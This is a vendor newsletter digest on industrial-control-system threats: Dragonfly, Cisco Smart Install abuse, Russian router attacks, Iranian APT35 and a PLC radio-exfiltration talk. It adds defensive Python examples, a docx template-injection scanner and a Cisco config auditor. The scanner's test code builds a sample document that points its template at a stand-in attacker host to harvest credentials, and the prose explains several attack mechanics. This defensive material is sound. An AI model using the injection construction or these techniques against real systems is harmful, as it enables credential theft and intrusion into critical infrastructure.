The CyberX-Files – Issue #4
Digest of notable ICS cybersecurity content — curated by CyberX’s ICS security geeks
Welcome to the 4th edition of the CyberX-Files. In this issue, we have a number of new stories about Dragonfly (aka Energetic Bear), the Russian threat group that’s targeted energy firms since at least 2013. You’ll also read about why Iran is now perceived as having an “A-Team” of cyberattackers, and why routers are now juicy targets for attackers.
Here at CyberX, we’re continuing our global series of ½-day best practices seminars titled “Emerging ICS/SCADA Threats and How to Maximize Operational Resilience.” In April, we held our second seminar in London featuring CISOs and other executives from Teva Pharmaceuticals, Scotland Gas Networks (now known as SGN), and DXC Technology, a $25B end-to-end IT services company created by the merger of CSC and the Enterprise Services business of Hewlett Packard Enterprise.
Both seminars featured educational presentations and lively conversations about the new ICS threat landscape, why legacy defenses are no longer sufficient, and how to build a unified IT/OT security strategy around the corporate SOC.
In This Newsletter
- Oil & Gas Companies Aren’t Spending As Much as Other Sectors on Cybersecurity
- Dragonfly Compromises Core Router to Attack Critical Infrastructure
- “Don’t Mess With Our Elections”: Vigilante Hackers Strike Russia, Iran
- Russia is Hacking Routers in Global Cyberattacks, US and UK Warn
- Iran ‘the New China’ as a Pervasive Nation-State Hacking Threat
- Responding to a Third Party Cyberattack in Three Steps
- Echoing TRITON, CyberX’s Innovative ICS Security Research Presented at 2018 RSA Conference
ICS/SCADA/OT Security News
Oil & Gas Companies Aren’t Spending As Much as Other Sectors on Cybersecurity
- According to one analysis, energy companies spend less than 0.2% of their revenue on cybersecurity, at least a third less than financial institutions.
- At the same time, Symantec is now tracking at least 140 hacking groups targeting the energy industry — up from 87 in 2015 (61% increase).
- The attack surface is also increasing. To lower operating costs, the industry has been adding IIoT sensors to track data and control flows from 900,000 oil and gas wells, and 300,000 miles of pipelines. But according to Matthew Stegall, who performs security assessments for Deloitte & Touche and KPMG, these devices are “fairly wide open from a security perspective” — although he also says that energy companies are now beginning to strengthen their OT security.
- “Air gapping” offers a false sense of protection because it’s fairly easy to pivot from corporate IT networks to OT networks. [The recent FBI/DHS alert demonstrated this clearly: Russian threat actors reached OT networks by stealing remote-access credentials from OT personnel.]
- Another challenge is IT/OT silos: the CIO or CISO is responsible for the IT security, while operations staff typically report to a different boss. The result: a communications gap.
- Many energy executives falsely believe the Defense Department or Homeland Security is defending them. But they can’t because the government lacks the capability, expertise and, importantly, the legal standing to defend civilian assets before they’re attacked.
- Dragonfly, a Russian group targeting energy companies that’s been around since at least 2011, became “a lot more aggressive” in 2017. The group has been gaining information on how energy companies work and figuring out how to maintain stealth access on their systems.
- “What our adversaries are really doing is relentlessly probing for weakness that can be exploited down the road for political, economic, and military gain.”
Dragonfly Compromises Core Router to Attack Critical Infrastructure
- A core Cisco router belonging to one of Vietnam’s largest oil-rig manufacturers was compromised by Dragonfly and used as command-and-control infrastructure for a phishing campaign.
- The stolen credentials were later used to attempt to penetrate energy companies in the UK last March.
- The phishing attack used a technique called template injection. The attached Word documents contain no macros; instead, each document’s settings reference an external template hosted on an attacker-controlled SMB server. When the document is opened, Windows connects to that server automatically (the “Redirect to SMB” behavior) and authenticates, leaking the user’s NTLM credential hash, which is how the credentials are harvested, and the server can answer with a malicious template that installs malware on the victim’s machine. Unlike common phishing attacks, the documents themselves contain nothing overtly malicious.
- The same technique was described in the recent FBI/DHS alert about Russian threat actors compromising US critical infrastructure. In both cases, fictitious resumes were used as attachments.
- The use of compromised routing infrastructure for command-and-control purposes is not new, but it is rarely detected. Compromising a router usually means tampering with its firmware, and there are few forensic tools for examining router firmware; analysis is further hampered by the lack of system logs.
- Additionally, vulnerabilities in core infrastructure like routers are not easily closed or remediated.
- The article also notes that, since 2013 and perhaps earlier, Dragonfly has been targeting energy companies in diverse geographies including Kazakhstan, Ireland, Turkey, the UK, and the US.
“Don’t Mess With Our Elections”: Vigilante Hackers Strike Russia, Iran
- A group of hackers targeted Cisco network devices at ISPs, data centers, and websites in Russia and Iran.
- In addition to disabling the equipment, the hackers left a note on affected machines: “Don’t mess with our elections,” along with an image of an American flag.
- The Iranian news agency said the attack affected 200,000 switches worldwide, including 3,500 in Iran.
- “We were tired of attacks from government-backed hackers on the United States and other countries,” someone in control of an email address left in the note told Motherboard. “We simply wanted to send a message.” The group was later identified as calling itself “JHT.”
- The attack exploited Cisco Smart Install, a legacy plug-and-play feature designed for zero-touch deployment of new Cisco switches. The Smart Install client listens on TCP port 4786 without authentication, so a remote attacker who can reach that port can modify the switch’s TFTP server setting, exfiltrate and modify configuration files, replace the IOS image, and execute high-privilege CLI commands.
- Using Shodan, Talos found 168,000 systems potentially exposed to this vulnerability.
- The hackers claimed to have fixed the Cisco issue on exposed devices in the US and UK “to prevent further attacks.”
- Talos considers this activity a response to a March alert from the FBI/DHS, which said Russian government hackers were targeting energy and other critical infrastructure sectors.
Russia is Hacking Routers in Global Cyberattacks, US and UK Warn
- In mid-April, the U.S. and U.K. teamed up to issue an unprecedented joint warning about state-sponsored Russian cyber actors targeting network infrastructure devices.
- The alert states: “Organizations that use legacy, unencrypted protocols to manage hosts and services, make successful credential harvesting easy for these actors. An actor controlling a router between ICS-SCADA sensors and controllers in a critical infrastructure—such as the Energy Sector—can manipulate the messages, creating dangerous configurations that could lead to loss of service or physical destruction. Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.”
- Russian attackers have been using the Smart Install Exploitation Tool (SIET), which has been publicly available since November 2016. They are also abusing other legacy protocols, including Telnet, GRE, and SNMP.
- Russian actors have conducted both broad-scale and targeted scanning of Internet address spaces, allowing them to identify Internet-facing ports and services, conduct device fingerprinting, and discover vulnerable network infrastructure devices.
- They can abuse security gaps to harvest login credentials, map internal network architectures, modify device firmware, and copy or redirect victim traffic through Russian-controlled infrastructure.
- The alert was a joint effort by the US FBI and DHS, along with the UK’s National Cyber Security Centre (NCSC).
Iran ‘the New China’ as a Pervasive Nation-State Hacking Threat
- Mandiant investigated a cyberattack by the hacker group APT35 that targeted an energy company.
- APT35 infected the target via a spear phishing email which compromised the victim’s VPN credentials.
- The attackers also compromised the organization’s Outlook Web Access (OWA) portal so they could read emails and steal data on Middle East organizations that they later targeted in data-destruction attacks.
- The median dwell time from compromise to discovery is now at 101 days — around 3 ½ months — up from 99 days in 2016.
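The template-injection technique in the Dragonfly item above comes down to one relationship inside the .docx package: `word/_rels/settings.xml.rels` declares an external attachedTemplate whose target is a UNC path or file:// URL on the attacker’s host, and Word fetches it (authenticating over SMB) the moment the document opens. The Python script below is an added example, not code from CyberX, Cylance, or the FBI/DHS alert. It builds a constructed sample document in memory, using the RFC 5737 documentation address 203.0.113.10 as a stand-in for the attacker’s server, and scans any .docx for relationships that would make Office reach out to a remote host, which is a cheap check to run at a mail gateway or during triage.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ATTACHED_TEMPLATE = OFFICE_REL + "/attachedTemplate"
HYPERLINK = OFFICE_REL + "/hyperlink"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def remote_host(target):
    """Return the host a relationship Target would make Office contact, or None if local."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):          # UNC path \\host\share\file
        host = t.lstrip("\\/").replace("\\", "/").split("/", 1)[0]
        return host or None
    u = urlparse(t)
    if u.scheme.lower() in ("file", "http", "https", "smb", "ftp") and u.netloc:
        return u.hostname                                   # file:///C:/... has no netloc -> None
    return None


def find_remote_templates(docx_bytes):
    """Scan every .rels part of an OOXML package for external relationships that
    point at a remote host. Hyperlinks are skipped (they fire only on click); an
    attachedTemplate or any other part-level relationship is fetched on open."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype, target = rel.get("Type", ""), rel.get("Target", "")
                host = remote_host(target)
                if rtype == HYPERLINK or host is None:
                    continue
                hits.append({"part": name, "type": rtype.rsplit("/", 1)[-1],
                             "target": target, "host": host})
    return hits


def build_docx(template_target):
    """Constructed test input: the three parts a template-injection document needs.
    A real .docx has more parts ([Content_Types].xml, _rels/.rels, ...); the scanner
    only reads the .rels files, so they are omitted here."""
    document = (f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>Curriculum vitae'
                '</w:t></w:r></w:p></w:body></w:document>')
    settings = (f'<w:settings xmlns:w="{W_NS}" xmlns:r="{OFFICE_REL}">'
                '<w:attachedTemplate r:id="rId1"/></w:settings>')
    settings_rels = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                     f'Type="{ATTACHED_TEMPLATE}" Target="{template_target}" '
                     'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document)
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # 203.0.113.10 is an RFC 5737 documentation address standing in for the attacker's server.
    sample = build_docx("file://203.0.113.10/share/resume.dotm")
    for hit in find_remote_templates(sample):
        print(f"{hit['part']}: {hit['type']} -> {hit['host']} ({hit['target']})")
```

A template that points at a local path (for example Normal.dotm under the user’s profile) is normal and is not reported; only targets with a network host are flagged. Because the check reads the package metadata rather than document content, it also catches the http:// variant in which the SMB connection is reached through a redirect.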
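The Smart Install item and the US/UK alert above both come down to legacy management services left enabled on network devices. The Python audit below is an added example, not code from Talos, Cisco, or the alert. It reads Cisco IOS running-config text and flags the four things those items name: a Smart Install client that has not been turned off with `no vstack`, vty lines that still accept Telnet, SNMPv1/v2c community strings, and GRE tunnels whose far end should be confirmed. The two configurations are constructed samples, not from any real device; the first shows the weak settings and the second the hardened form.

```python
import re

# Constructed sample configs (not from any real device). The first is the kind of
# legacy setup the alert describes; the second is the same device hardened.
WEAK_CONFIG = """\
hostname core-rtr-1
!
snmp-server community public RO
snmp-server community private RW
!
interface Tunnel0
 ip address 10.0.0.1 255.255.255.252
 tunnel source GigabitEthernet0/0
 tunnel destination 198.51.100.7
!
line vty 0 4
 transport input all
!
"""

HARDENED_CONFIG = """\
hostname core-rtr-1
!
no vstack
!
snmp-server group OPS v3 priv
!
line vty 0 4
 transport input ssh
!
"""


def parse_sections(config_text):
    """Split IOS running-config text into top-level lines and the indented
    children of each section header (interface, line vty, ...)."""
    top_level, sections = [], {}
    current = None
    for raw in config_text.splitlines():
        if not raw.strip() or raw.startswith("!"):   # '!' separates sections
            current = None
            continue
        if raw.startswith(" ") and current is not None:
            sections[current].append(raw.strip())
        else:
            current = raw.strip()
            top_level.append(current)
            sections.setdefault(current, [])
    return top_level, sections


def audit_ios_config(config_text):
    """Return (check, detail) findings for the legacy services named in the alert."""
    findings = []
    top_level, sections = parse_sections(config_text)

    # Smart Install: the client listens on TCP 4786 unless it is explicitly disabled.
    if "no vstack" not in top_level:
        findings.append(("smart-install",
                         "Smart Install client not disabled; add 'no vstack' (TCP 4786 reachable)"))

    # SNMP v1/v2c: the community string is the only secret and crosses the wire in cleartext.
    for line in top_level:
        m = re.match(r"snmp-server community (\S+)(?:\s+(RO|RW))?", line)
        if m:
            name, mode = m.group(1), m.group(2) or "RO"
            default = " (well-known default)" if name.lower() in ("public", "private") else ""
            findings.append(("snmp-v1v2c",
                             f"community '{name}' {mode}{default}; move to SNMPv3 authPriv"))

    for header, body in sections.items():
        # vty lines: Telnet stays reachable unless transport input is restricted to ssh.
        if header.startswith("line vty"):
            allowed = {w for l in body if l.startswith("transport input") for w in l.split()[2:]}
            if not allowed or allowed & {"all", "telnet"}:
                findings.append(("telnet",
                                 f"{header}: transport input {' '.join(sorted(allowed)) or 'not set'}; "
                                 "use 'transport input ssh'"))
        # GRE tunnels are often legitimate, but the alert lists them as a redirection path,
        # so every far-end address is reported for review. IOS omits the default GRE mode
        # from show run, so a missing 'tunnel mode' line means GRE.
        if header.startswith("interface Tunnel"):
            mode = next((l for l in body if l.startswith("tunnel mode")), "tunnel mode gre ip")
            dest = next((l.split()[-1] for l in body if l.startswith("tunnel destination")), "?")
            if "gre" in mode:
                findings.append(("gre-tunnel", f"{header}: {mode} to {dest}; confirm the endpoint"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        results = audit_ios_config(cfg)
        print(f"== {label}: {len(results)} finding(s)")
        for check, detail in results:
            print(f"  [{check}] {detail}")
```

Feed it the `show running-config` output your configuration-backup tooling already collects. The Smart Install, Telnet, and SNMP findings are direct hardening actions; the GRE finding is review-only, since tunnels are frequently legitimate and the point is to know where each one terminates.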
CyberX In The News
Wall Street Journal
Responding to a Third Party Cyberattack in Three Steps
After a cyberattack hit the natural gas industry communications system vendor Energy Services Group LLC in April, one of its customers was able to quickly shift over to an internal system to maintain operations. The incident offers a lesson in how companies can respond in three steps when a vendor or partner is compromised.
Research & Technology News
CyberX Press Release
Echoing TRITON, CyberX’s Innovative ICS Security Research Presented at 2018 RSA Conference
- At the 2018 RSA Conference, CyberX VP of Research David Atch presented the session Mind the Air-Gap: Exfiltrating ICS Data via AM Radios and Hacked PLC Code as part of the “Hackers and Threats — Advanced” track.
- CyberX became the first ICS behavioral anomaly detection platform vendor to demonstrate an ICS/SCADA exploit at RSA, one of the world’s premier cybersecurity conferences. Speaking positions at the RSA Conference are highly competitive, with thousands of submissions for only a few hundred speaking positions.
- During his session, David discussed a novel attack technique that stealthily injects rogue ladder logic code into PLCs without interrupting their normal operation. The approach is similar to the TRITON attack on a petrochemical facility in Saudi Arabia, in which attackers injected malicious code into Triconex safety instrumented system (SIS) controllers, with the likely goal of triggering an explosion that would cause catastrophic physical and environmental damage and potentially loss of human life.
- The method also undermines the myth of air-gapped ICS networks, which are theoretically isolated from corporate IT networks and the outside world. In the CyberX demonstration, the rogue ladder logic is crafted to generate encoded radio signals that an ordinary AM radio can receive, letting an adversary exfiltrate sensitive IP such as proprietary formulas and recipes, or reconnaissance data about deployed ICS/SCADA devices to aid in planning future destructive attacks.
Founded by military cyber-experts with nation-state expertise defending critical infrastructure, CyberX provides the most widely-deployed platform for continuously reducing ICS and IIoT risk.
Our ICS-specific self-learning engine delivers accurate insights about assets, targeted attacks, malware, vulnerabilities, and attack vectors — in less than an hour — without relying on rules or signatures, specialized skills, or prior knowledge of the environment.
CyberX is a member of the IBM Security App Exchange Community and has partnered with premier solution providers worldwide including Optiv Security and Deutsche-Telekom/T-Systems.
To see CyberX’s OT security platform in action, request a demo here.